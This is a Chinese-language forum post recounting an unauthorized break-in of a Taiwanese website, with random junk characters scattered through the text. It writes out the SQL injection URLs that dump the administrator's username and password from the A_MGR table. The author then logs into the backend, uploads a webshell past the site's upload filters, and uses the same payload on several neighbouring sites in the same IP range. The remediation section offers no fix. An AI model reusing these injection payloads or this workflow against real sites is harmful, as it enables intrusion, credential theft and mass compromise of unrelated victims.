发现一个注入点
8 N/ x, r" J& T1 ^9 X/ u( t3 zhttp://www.xxx.com /Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI20120506105833897 |2 Z! [+ f1 \8 N u- Y( a F0 J8 d
' S! D" d% d9 S习惯性的加’having1=1--
% [8 w4 v( L' \/ `
% V5 ^4 Y% |! E' K4 y1 d" Q+ x0 qhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’having 1=1—% d3 o& f- R& s/ z. n( V6 d
6 L1 _- i3 Z8 ~; i; ?
0
$ `7 r& i" `+ @4 ^3 A1 Z, N8 w5 D5 @+ w& f; c8 u) D. j2 F3 e
爆出Diary_A.dl_Title(这时候很激动啊)
, n7 L$ }: p% \) b/ ^1 m
# L! s0 U. u2 I4 q5 z那么继续+ l5 i9 L! l+ z" k' v
http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389’group by dl_Title having 1=1—
# Q# Z2 e I$ ?7 r* Y2 T4 \" m* f: b" D) |% `
继续,一直爆下去
* {8 _( ?5 X2 ^7 I# |6 P2 P8 Q' y+ O$ H2 u# m7 b/ h
爆到几个字段和表段 但是没找到需要的管理用户的字段! U6 E0 a+ f& U( ]& ^) s
& m( G) P2 t7 `" e0 Q8 P
蛋疼了 怎么办 然后去后台登陆页看源码
+ |4 Q4 B) S# O( g# k& i p9 T0 G
8 \; W6 S1 I4 ^- K3 h0
# ]7 N! X1 z& t0 m: B. C* y {* }( z9 V. [: E2 [
Input name= “ADUID”
) Y* t! D* E% `1 v0 f& hInput name= “ADPWD”; i+ |% N# H4 b1 ~
: O: }! Q: D D
很幸运 找到了字段那就继续# [2 H0 U- w& f' z- p9 w o* g# v; {
找到之后开始爆用户
0 |7 A# W. D5 N8 `http://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_UID from A_MGR)>0—1 c% v7 x" q9 u% y7 V" h9 N/ Z
爆密码
5 |6 ^+ k- V% h b- `( ~# S5 h9 Qhttp://www.xxx.com.tw/Diary_A.asp?UBID=&DCID=DC2012050610553697&DIID=DI2012050610583389'and(select top 1 MGR_PWD from A_MGR)>0—+ n8 Y- {. i2 K' Z# v5 {& g
测试了下 这个注入点只能爆到文章哪里的表
) U% s: d4 j) n* \2 x+ _" z* Q k! i' u. d- K x1 R) \2 @. V e& d% V$ d
头疼 继续 既然只能报道文章哪里的表去后台爆 不过后台字符限制了
6 Z/ d3 F: P& O0 ~0 s2 D s, w6 B8 d+ c h5 \
又想到 用户登录哪里也可以的吧就去试试 果然 今天我很幸运吧 爆出来了
" P5 S/ e8 c- Q" \7 ]9 g0 l* m2 g! T
473& ?' Y( j. u& Y
0 z; U: K" ]9 Z进后台$ { i% x; u, R1 S8 k
! ]# M8 s. j* i/ {! _( M7 v* N) L. ~* [+ B3 a7 |& U W7 t
发现几个上传点 有的地方不能上传 而且防止恶意代码
+ W- c, r) M/ U' v8 Q# Q; A* q1 p& @$ v- U
没办法 各种百度各种找大牛 找到一只好像可以突破的马
! C0 ?/ C3 u+ F9 y+ ], Z$ R b0 f5 I: C2 l; n$ q# O3 k4 b
- S4 k+ {4 o) }: R0 F
在系统管理那里直接上传 不过没有显示地址
* z7 [8 I5 {* s% H! n4 l& ~2 o7 T1 l# N* W( F& f
再上传一次 抓包 搞定OK
$ t$ o8 I6 v% ? X+ R
4 s$ @3 r0 Y. ~* _! e
' ]( s& Z) T9 N& _: q# v" y
! J% {, }6 t" N472+ S! m& `- ]# O* p, g* T
) ~& z1 y) V$ b2 K
晚上不行了 去睡觉。。。" I2 {! Z- y9 I* |; ^6 G! f" H
第二天刚起床 闲的没事做继续日站吧
; w6 q7 P! m9 G3 a
9 W$ N8 i- r# ^0 N5 C% x, C找个站 就把这个站的旁c扫了下# r7 y' I/ E9 O
& I" C# [# q) F1 C% D: f5 ]& T" I发现c段也有一个购物站 ,然后还和这个站的模板差不多) {9 o. U" u- N" b! z ]! X2 O S
) p1 e& o2 M' M, g: O2 a& N$ S就找到会员登录口测试1 p1 x, o3 C5 _( X1 @. a
4 k M( p4 k! I'and (select top 1 MGR_UID from A_MGR)>0—2 u. w! c( F: y3 j s, Y- P
果断爆到了 这时候我很激动 通杀; \' v+ e+ o8 _% r5 X7 s
+ T5 c9 B% A* @# X% J: s再次翻c段
. S1 m2 H$ n" C( g
; E, ^# A3 { K- s0 @翻出几个站 都成功拿下
, g, V; M: Y& l# ?% q
8 p, k6 C+ c0 S( z _9 c1 I1 e; T4 H
) G! b/ L/ U) J9 G4 p
修复方案:9 C0 x; l' B! N% }( Q; J* D
他们比我专业 * r, [ \7 U3 F+ d: l
! k& f I$ d+ c0 ^, z( V3 p
3 q4 ~, T% D9 V( G* C" a
8 O% [9 Y" M: J- V6 I. k
|
发表于 2013-4-4 17:40:38
收藏
支持
反对